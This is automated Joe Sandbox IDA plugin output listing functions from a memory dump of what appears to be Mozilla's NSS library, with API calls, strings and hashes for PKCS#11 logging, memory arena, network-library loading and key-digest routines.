Opcode Fuzzy Hash: 8cd71aa5259e08804d84ce00b916783c5f65e92eb3a4b636e9759fe1e010f48e
Instruction Fuzzy Hash: CB616DB5E01146ABDF10CF65CD80AAFB7BAFF84358F184128DC19A7740E731E955CAA1

Function 6CA78E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA78E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA78E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA78EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBA18D0,?), ref: 6CA78F03
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA78F19
PL_FreeArenaPool.NSS3(?), ref: 6CA78F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA78F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA78F65
PL_FinishArenaPool.NSS3(?), ref: 6CA78FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CA78FFE
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA79012
PL_FreeArenaPool.NSS3(?), ref: 6CA79024
PL_FinishArenaPool.NSS3(?), ref: 6CA7902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CA7903E

Strings

security, xrefs: 6CA78EE7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 3ac047f6cc0ff1a5422238ed357c185b8ab47e6ae8229f963200339591b31e61
Instruction ID: 5cb37552760a2c87b6f3ba8fe7f4ade011e7fcf1efcbb06104eeccd8ecbab19f
Opcode Fuzzy Hash: 3ac047f6cc0ff1a5422238ed357c185b8ab47e6ae8229f963200339591b31e61
Instruction Fuzzy Hash: 215159B9608340ABD7209A589D41FAB33A8BF8575CF05082EF555A7B40E731E9898773

Function 6CAA4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CAA4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA4EC7

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAA4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CAA4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAA4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAA4F68

Strings

hSession = 0x%x, xrefs: 6CAA4EA2, 6CAA4EB2
hObject = 0x%x, xrefs: 6CAA4EF5, 6CAA4F05
ulCount = %d, xrefs: 6CAA4F63
C_GetAttributeValue, xrefs: 6CAA4E7E
pTemplate = 0x%p, xrefs: 6CAA4F4A
(CK_INVALID_HANDLE), xrefs: 6CAA4EC0, 6CAA4F13

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 021c1ab04e47c27f292b15c426b1a1e2baa3537e820f36eef846593ab5e7e9ff
Instruction ID: 4a571c92463ec70d4169aabb30fb89eb1143695fbb66db145ae4eb54755f633d
Opcode Fuzzy Hash: 021c1ab04e47c27f292b15c426b1a1e2baa3537e820f36eef846593ab5e7e9ff
Instruction Fuzzy Hash: 0541F435602194BFDB008F94ED58F9EB7B5EB4671DF089025F90857A11DB30AD8ECBA2

Function 6CAA4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CAA4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA4D37

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAA4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CAA4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CAA4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CAA4E20

Strings

hSession = 0x%x, xrefs: 6CAA4D12, 6CAA4D22
hObject = 0x%x, xrefs: 6CAA4D65, 6CAA4D75
pulSize = 0x%p, xrefs: 6CAA4DB7
*pulSize = 0x%x, xrefs: 6CAA4E1B
C_GetObjectSize, xrefs: 6CAA4CEE
(CK_INVALID_HANDLE), xrefs: 6CAA4D30, 6CAA4D83

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 30163fb00854a3e1816d1771285737442ce76123017852993f9024acc7c7a8f7
Instruction ID: 68758c07c10e2419708b1cd9a101bf6bf72c9517916d59ee225545ae4f2ae865
Opcode Fuzzy Hash: 30163fb00854a3e1816d1771285737442ce76123017852993f9024acc7c7a8f7
Instruction Fuzzy Hash: 0C41F635601294BFDB008F94ED98F6E7775EB4631DF048025F9086BA11DB31AC8DCB52

Function 6CAA7C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6CAA7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA7CF3

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAA7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAA7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CAA7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CAA7D77

Strings

hSession = 0x%x, xrefs: 6CAA7CCE, 6CAA7CDE
ulSignatureLen = %d, xrefs: 6CAA7D72
pSignature = 0x%p, xrefs: 6CAA7D59
C_Verify, xrefs: 6CAA7CB1
pData = 0x%p, xrefs: 6CAA7D25
ulDataLen = %d, xrefs: 6CAA7D40
(CK_INVALID_HANDLE), xrefs: 6CAA7CEC

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 93ca1007ae8559763f21784af4945ab261f84a274997cedc929f75fd9e65f860
Instruction ID: 1f0cde704b448eb6afbbe3e03af73dc539f531fc58d04592114e083095a7e0e5
Opcode Fuzzy Hash: 93ca1007ae8559763f21784af4945ab261f84a274997cedc929f75fd9e65f860
Instruction Fuzzy Hash: 233106356021D1AFDB10CFA4ED58F6F7BB5EB46319F488065E80897611DB30AC89CFA2

Function 6CAA2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6CAA2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA2F63

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CAA2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CAA2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CAA2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CAA2FE7

Strings

hSession = 0x%x, xrefs: 6CAA2F3E, 6CAA2F4E
C_SetPIN, xrefs: 6CAA2F21
pOldPin = 0x%p, xrefs: 6CAA2F95
ulOldLen = %d, xrefs: 6CAA2FB0
ulNewLen = %d, xrefs: 6CAA2FE2
pNewPin = 0x%p, xrefs: 6CAA2FC9
(CK_INVALID_HANDLE), xrefs: 6CAA2F5C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: a1b04c858f73c39accfe5f8bd51ed6a6d66cd1b8e464c142dd50ce861680c888
Instruction ID: 8ae84b76dec006547def2ede3b2bc3bc2343fbc07e00eefcd6b6c6bc77152a31
Opcode Fuzzy Hash: a1b04c858f73c39accfe5f8bd51ed6a6d66cd1b8e464c142dd50ce861680c888
Instruction Fuzzy Hash: A93117356021D4BFDB008F95DD5CE5E7BB5EB4A319F088165E80867711DB30ECA9CB92

Function 6CAAA9A0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6CAAA9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAAA9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAAAA03

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAAAA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CAAAA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CAAAA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6CAAAA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6CAAAA87

Strings

hSession = 0x%x, xrefs: 6CAAA9DE, 6CAAA9EE
ulAssociatedDataLen = 0x%p, xrefs: 6CAAAA82
C_DecryptMessageBegin, xrefs: 6CAAA9C1
pAssociatedData = 0x%p, xrefs: 6CAAAA69
pParameter = 0x%p, xrefs: 6CAAAA35
ulParameterLen = 0x%p, xrefs: 6CAAAA50
(CK_INVALID_HANDLE), xrefs: 6CAAA9FC

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin
API String ID: 1003633598-2188218412
Opcode ID: 65655ad35110e265139b142b379383ba9aa6f0544f9dac86d2daef8c41ad7787
Instruction ID: 99b47dab1a15c273b86b9d8a83fddf6bf3c69e56c4fe8a918f7ffcc495b1efb7
Opcode Fuzzy Hash: 65655ad35110e265139b142b379383ba9aa6f0544f9dac86d2daef8c41ad7787
Instruction Fuzzy Hash: 5F31D6356021D5AFDB00DF94DE58F9E7BF6EB46319F488065E80857A11D730AC89CB52

Function 6CB3CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB3CC7B), ref: 6CB3CD7A

Part of subcall function 6CB3CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CAAC1A8,?), ref: 6CB3CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB3CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB3CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CB3CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB3CD8E

Part of subcall function 6CA605C0: PR_EnterMonitor.NSS3 ref: 6CA605D1
Part of subcall function 6CA605C0: PR_ExitMonitor.NSS3 ref: 6CA605EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB3CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB3CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB3CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB3CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CB3CE48

Strings

ws2_32.dll, xrefs: 6CB3CD75
getnameinfo, xrefs: 6CB3CDB2, 6CB3CE23
freeaddrinfo, xrefs: 6CB3CD9F, 6CB3CE10
getaddrinfo, xrefs: 6CB3CD88, 6CB3CDF9
wship6.dll, xrefs: 6CB3CDE3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: fc10fa1965df9c391e0a71f7d2003eb495e931e5109106a16c33105262e12745
Instruction ID: c873717a886f54ef5c0ef3a8564b9c4ca0c92b45ac503a397fa8e352825a6cd3
Opcode Fuzzy Hash: fc10fa1965df9c391e0a71f7d2003eb495e931e5109106a16c33105262e12745
Instruction Fuzzy Hash: 6611E9F9E021B112D705A6FA6C1099A3858DB1212EF1C9639F81DD2F41FB21E58D82E7

Function 6CB81C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CB813BC,?,?,?,6CB81193), ref: 6CB81C6B
PR_NewLock.NSS3(?,6CB81193), ref: 6CB81C7E

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PR_NewCondVar.NSS3(00000000,?,6CB81193), ref: 6CB81C91

Part of subcall function 6CA5BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA621BC), ref: 6CA5BB8C

PR_NewCondVar.NSS3(00000000,?,?,6CB81193), ref: 6CB81CA7

Part of subcall function 6CA5BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA5BBEB
Part of subcall function 6CA5BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA5BBFB
Part of subcall function 6CA5BB80: GetLastError.KERNEL32 ref: 6CA5BC03
Part of subcall function 6CA5BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA5BC19
Part of subcall function 6CA5BB80: free.MOZGLUE(00000000), ref: 6CA5BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6CB81193), ref: 6CB81CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6CB81193), ref: 6CB81CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CB81193), ref: 6CB81CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6CB81193), ref: 6CB81D1A

Part of subcall function 6CB39BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA61A48), ref: 6CB39BB3
Part of subcall function 6CB39BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA61A48), ref: 6CB39BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CB81193), ref: 6CB81D3D

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6CB81193), ref: 6CB81D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CB81193), ref: 6CB81D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CB81193), ref: 6CB81D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CB81193), ref: 6CB81D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6CB81193), ref: 6CB81D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6CB81193), ref: 6CB81D93
PR_DestroyLock.NSS3(00000000,?,?,6CB81193), ref: 6CB81D9F
free.MOZGLUE(00000000,?,6CB81193), ref: 6CB81DA8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 8431b73408a1082d103c31c817b1d52abb544000555fe3ecc73e237b299eb84e
Instruction ID: 056f51a26e29b12c39454f192567779badbc659ef38a35b612e4fa04ced2d41d
Opcode Fuzzy Hash: 8431b73408a1082d103c31c817b1d52abb544000555fe3ecc73e237b299eb84e
Instruction Fuzzy Hash: 5F31E9F1E027519BEB109F25AC01A5B76F4EF0565DB084538E85A87F41FB31E518CBA2

Function 6CAD5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CAD5EC0,00000000,?,?), ref: 6CAD5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CAD5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAD5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAD5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CAD5EC0,00000000,?,?), ref: 6CAD5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CAD5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CAD5D80

Strings

multiaccess:, xrefs: 6CAD5CB8
dbm:, xrefs: 6CAD5D03, 6CAD5D60
sql:, xrefs: 6CAD5CD1, 6CAD5D36
extern:, xrefs: 6CAD5CEA, 6CAD5D4B
NSS_DEFAULT_DB_TYPE, xrefs: 6CAD5D1A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 1ccff6fa0f953eebf457a25b0192fe698e9a7834082c3024af7fb14bb362fd1e
Instruction ID: 6895edb45ebd172c3ed3889b1f6fd17753c816a043f90865ce8a9b66ecae8cd8
Opcode Fuzzy Hash: 1ccff6fa0f953eebf457a25b0192fe698e9a7834082c3024af7fb14bb362fd1e
Instruction Fuzzy Hash: 093104F46013426BE7019E258C5CB363368EF27258F290030EDD5B7A81EAB1F641C279

Function 6CAD6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBA1DE0,?), ref: 6CAD6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CAD6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CAD6D82
DER_GetInteger_Util.NSS3(?), ref: 6CAD6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAD6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CAD6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CAD6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CAD6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CAD6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAD7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CAD7033
free.MOZGLUE(?), ref: 6CAD703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CAD7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CAD7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CAD70AF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 6e35576eca51e2962ee11cdfe7091f87acce765efe4dc6d67c6aeacfc563b9c3
Instruction ID: 7723654eee761290bab966682dea6d47146d8d7079305e7bff81b2aa2d167bc6
